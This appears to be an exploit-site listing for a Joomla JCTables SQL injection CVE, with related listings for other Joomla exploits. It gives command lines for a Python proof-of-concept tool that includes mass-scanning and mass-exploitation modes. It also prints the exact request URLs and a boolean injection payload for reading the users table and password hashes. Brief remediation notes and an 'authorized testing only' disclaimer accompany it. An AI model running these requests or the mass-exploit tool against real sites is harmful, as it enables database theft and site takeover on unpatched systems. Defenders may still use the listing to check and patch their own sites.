CVE-2026-76570 — Joomla JCTables (com_jctables) Unauthenticated SQL Read/Write via JSON API
September 30, 2026 · 210 views
Joomcode JCTables 1.0.0–1.20.0: unauthenticated front-end JSON tasks (getdatarow, getrow) concatenate table/column names into SQL with broken escaping — arbitrary DB read/write (CWE-89/CWE-862). CVSS 4.0 10.0 Critical (AT:N). Fixed in 1.21.1+. Python PoC proves user row read (POCBIT-76570-OK); check + exploit + mass -j.
Description
Overview
CVE-2026-76570 — Joomcode JCTables (com_jctables) for Joomla — unauthenticated SQL injection on the public JSON CRUD API.
| | | |---|---| | CNA | Joomla! Project (PUBLISHED 2026-09-30) | | Affected | 1.0.0 – 1.20.0 (lab confirms ≤ 1.10.31.2) | | Fix | ≥ 1.21.1 (2026-08-05) | | CWE | CWE-89, CWE-862 | | CVSS 4.0 | 10.0 Critical — AT:N (no special admin configuration) |
Front-end controller tasks run without token / ACL. Table and column identifiers from the request are concatenated into SQL; ladb_escape() mishandles quote-wrapped values. getdatarow can read arbitrary tables (e.g. {prefix}users). Chained attacks (admin login / plugin RCE) are discussed in community write-ups; this PoC proves read (username / password hash row).
PoC page: https://pocbit.org/pocs/cve-2026-76570
GitHub: murrez/CVE-2026-76570
CVE.org: CVE-2026-76570
NVD: CVE-2026-76570
Bundled tool (Python 3)
Download cve-2026-76570.py — PoCbit bundle extractor (writes poc.py, _engine.py, _lab_test.py).
pip install requests urllib3 colorama
python cve-2026-76570.py
python poc.py --lab
python poc.py -u https://site.tld --check
python poc.py -u https://site.tld --prefix jos_
python poc.py --check hosts.txt -t 20
python poc.py hits.txt -t 12
python _engine.py --help
| Mode | Behavior |
|------|----------|
| check | Fingerprint com_jctables, version, JSON API reachability |
| exploit | Read proof from {prefix}users via getdatarow; marker POCBIT-76570-OK |
| mass | Interactive or --check / list file + threads → hits.txt, exploited.txt |
API surface
| Step | Request |
|------|---------|
| Read row | GET index.php?option=com_jctables&format=json&task=getdatarow&tn={prefix}users&idx=id&rid=1 |
| Boolean probe | GET …&task=getrow&mid=N&tid=T&idx='' OR (1=1) OR '' |
Remediation
- Upgrade JCTables to 1.21.1+ or remove the component.
- Inventory Joomla sites for com_jctables in extension lists.
- Review DB logs for unusual getdatarow / getrow access from anonymous IPs.
Legal and ethical use
Authorized security testing and patch validation only.
References
Related PoCs
Same platform, vendor, or tags — explore more write-ups on Pocbit.
- JoomlaCVE-2026-101110critical
CVE-2026-101110 — OrdaSoft Joomla Book Library (Free) Unauthenticated SQL Injection
OrdaSoft Book Library (Free) for Joomla ≤ 6.4.6: unauthenticated SQL injection (CWE-89) in books() via field/direction sort params — weak select substring blacklist + protectInjectionWithoutQuote, unquoted ORDER BY, session prime + `-- xselect` bypass (com_booklibrary). Fixed in 6.4.7+. CVSS 4.0 9.3 Critical. Python PoC: check, exploit, mass -j.
- JoomlaCVE-2026-101108critical
CVE-2026-101108 — OrdaSoft Joomla Vehicle Manager (Free) Unauthenticated SQL Injection
OrdaSoft Vehicle Manager (Free) for Joomla ≤ 6.5.7: unauthenticated SQL injection (CWE-89) via order_field and order_direction concatenated into unquoted ORDER BY in site/vehiclemanager.php (com_vehiclemanager). Escaping is ineffective for sort keys. Public category, search, and all-vehicles views. Fixed in 6.5.8+. CVSS 4.0 9.3 Critical. Python PoC: check, error-based exploit, mass -j.
- JoomlaCVE-2026-100752high
CVE-2026-100752 — OrdaSoft Joomla Real Estate Manager (Free) Unauthenticated SQL Injection
OrdaSoft Real Estate Manager (Free) for Joomla ≤ 6.7.8: unauthenticated SQL injection (CWE-89) via order_field concatenated into ORDER BY in site/realestatemanager.php (com_realestatemanager). Public category, search, and listing views — no auth. Fixed in 6.7.9+. Python PoC: fingerprint, check, error-based exploit, mass -j; legacy order_direction POST fallback.
- JoomlaCVE-2026-102425critical
CVE-2026-102425 — Joomla Balbooa Forms (com_baforms) Field Shortcode → Unauthenticated RCE
Balbooa Forms for Joomla 1.0.0–2.4.3.3: when a public form runs PHP-after-submission via eval(), field shortcodes are replaced with raw visitor input inside double-quoted PHP — classic ";breakout;// → RCE. CVSS 4.0 9.5 Critical (AT:P). Fixed in 2.4.3.4. Not CVE-2026-67364. Python PoC: version + public form detect, check/exploit, up.php drop, interactive + mass -j.